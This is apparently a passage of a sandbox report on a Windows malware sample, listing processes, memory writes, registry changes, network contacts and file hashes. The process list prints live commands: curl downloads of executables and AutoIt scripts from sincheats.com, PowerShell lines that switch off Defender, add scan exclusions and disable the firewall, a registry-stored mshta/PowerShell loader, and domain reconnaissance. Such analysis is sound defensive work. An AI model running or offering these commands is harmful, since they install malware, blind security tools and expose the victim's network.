N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2504 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 4212 wrote to memory of 3296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4212 wrote to memory of 3296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4212 wrote to memory of 3296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2504 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2356 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2356 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2356 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2504 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 3684 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3684 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3684 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2504 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 4012 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
PID 4012 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
PID 4012 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
PID 4896 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 4896 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 3792 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 3792 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 4896 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 4896 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 1692 wrote to memory of 3948 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 1692 wrote to memory of 3948 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 4896 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 4896 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 3036 wrote to memory of 3608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 3036 wrote to memory of 3608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 4896 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 4896 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 4228 wrote to memory of 376 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
PID 4228 wrote to memory of 376 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
PID 4228 wrote to memory of 376 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
PID 376 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 376 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 376 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 4896 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 3472 wrote to memory of 1060 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 3472 wrote to memory of 1060 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 4896 wrote to memory of 484 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 4896 wrote to memory of 484 N/A C:\Users\Admin\AppData\Roaming\EdgeData\A.exe C:\Windows\System32\cmd.exe
PID 484 wrote to memory of 1768 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 484 wrote to memory of 1768 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 484 wrote to memory of 1768 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 1768 wrote to memory of 620 N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 1768 wrote to memory of 620 N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 1768 wrote to memory of 620 N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 1768 wrote to memory of 620 N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 1768 wrote to memory of 620 N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 376 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 376 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 376 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe

"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\SysWOW64\curl.exe

curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

C:\Windows\SysWOW64\curl.exe

curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

C:\Windows\SysWOW64\curl.exe

curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe

C:\Windows\system32\curl.exe

curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

C:\Windows\system32\curl.exe

curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/WD.au3 --output WD.au3

C:\Windows\system32\curl.exe

curl http://sincheats.com/gas/12/WD.au3 --output WD.au3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start AutoIt3.exe WD.au3

C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

AutoIt3.exe WD.au3

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

C:\Windows\system32\curl.exe

curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

"C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xnq8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xnq8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453\\\DiagramClass'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xvsleyr -value gp; new-alias -name whpcnio -value iex; whpcnio ([System.Text.Encoding]::ASCII.GetString((xvsleyr "HKCU:Software\AppDataLow\Software\Microsoft\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453").CharFolder))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp" "c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp" "c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\34A2.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\34A2.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\58E.bin1 > C:\Users\Admin\AppData\Local\Temp\58E.bin & del C:\Users\Admin\AppData\Local\Temp\58E.bin1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 sincheats.com udp
US 217.21.76.148:80 sincheats.com tcp
NL 104.80.225.205:443 tcp
US 217.21.76.148:80 sincheats.com tcp
US 217.21.76.148:80 sincheats.com tcp
US 217.21.76.148:80 sincheats.com tcp
US 217.21.76.148:80 sincheats.com tcp
US 217.21.76.148:80 sincheats.com tcp
NL 84.53.175.107:80 tcp
NL 84.53.175.107:80 tcp
US 217.21.76.148:80 sincheats.com tcp
US 13.107.42.16:80 config.edge.skype.com tcp
DE 194.76.226.200:80 194.76.226.200 tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
BE 193.56.146.189:80 193.56.146.189 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
DE 194.76.226.200:80 194.76.226.200 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
US 8.8.8.8:53 giporedtrip.at udp
US 8.8.8.8:53 habpfans.at udp
PA 190.219.54.242:80 habpfans.at tcp

Files

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

MD5 bb0371ce2ac7e24536ace54e03700a9c
SHA1 6002d876e35075abc3595bc91d41c77d77311e71
SHA256 93248391cfe7319c7cd4b0291ab42b0d1ce6a967f5d89df2ac72555c026cb0b5
SHA512 d154ad51cbf62d77d2dc43224ec609abaa0f8db1cead0cca55f6bc06f93ed8abb33999b405c1052c4c813ef5fd5ceb0973c3eabb369cac16dd7b333db0b71842

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

MD5 bb0371ce2ac7e24536ace54e03700a9c
SHA1 6002d876e35075abc3595bc91d41c77d77311e71
SHA256 93248391cfe7319c7cd4b0291ab42b0d1ce6a967f5d89df2ac72555c026cb0b5
SHA512 d154ad51cbf62d77d2dc43224ec609abaa0f8db1cead0cca55f6bc06f93ed8abb33999b405c1052c4c813ef5fd5ceb0973c3eabb369cac16dd7b333db0b71842

C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

MD5 2557201a634b8e98c1ed3bfd39015a3a
SHA1 94496b50fc6507494381e5e5597dab49dd5121ab
SHA256 bca824981cc23516a047cebefab5c0f42df8d0f79b27000f53bfc16cd1149a32
SHA512 dd8bbf6a41003bda6c53ffa1053907f7d0e21e060c2f3c2d1af18dae4a65ed1e14d53810eea0661220efbf60359bebded3f6eed39890ea1b4cd2eb22026a5d93

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

MD5 0d820062cd4e9281229fc36bd2495bf0
SHA1 5375c3d8f680f956d487de87c187e7581cc7f677
SHA256 294585edf06fea398c1507bf6a002360e37c5b6516e1c1fb4fb2f4842c1adf9b
SHA512 0247de017b429d74e721075808eb15839514f62eb3d01668697c5aad909ecb371a73530fb70cc41b803bfe96defc48f05c95dd78d983a5df70c246426d85529d

C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

C:\Users\Admin\AppData\Local\Temp\WD.au3

MD5 a7dedbe8c2e9f408d53df42412fae7df
SHA1 b9b6d45367cf6fc08c023f10ad78a5ca4112d518
SHA256 6681330ccd6ece3b0f34d22cfc37421889db8556c4ddff56ceb3da4db9901d41
SHA512 abe5bb993d433d434646c85984fe8f92ff40bfec41431901ee0cb54026b401005c62361d906e7af3204fd7fb81d26a52b5720265b1be4666b874628e92d79596

C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/4728-141-0x00000000730F0000-0x00000000738A0000-memory.dmp

memory/4728-142-0x0000000002290000-0x0000000002291000-memory.dmp

memory/4728-143-0x00000000022C0000-0x00000000022F6000-memory.dmp

memory/4728-144-0x0000000004CC0000-0x00000000052E8000-memory.dmp

memory/4728-145-0x0000000002292000-0x0000000002293000-memory.dmp

memory/4728-146-0x0000000005320000-0x0000000005342000-memory.dmp

memory/4728-147-0x00000000054C0000-0x0000000005526000-memory.dmp

memory/4728-148-0x00000000055A0000-0x0000000005606000-memory.dmp

C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

MD5 377cac15c169282c8bb7eeccca102767
SHA1 147684c819d3df332cac15fa4df4ad0a286b7b8a
SHA256 908f8c8f384cb59942cd2fe544c50c5488b5bf275cb7ddacb5c02756a3be8dc5
SHA512 317cf4628ff282f38dc1c79e6049e2eb9ae73bc470bc10c896502a5567845dcb1363f2ded15016d567a99941060454b43742010e69d03e95cd4329cb6ca759c8

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
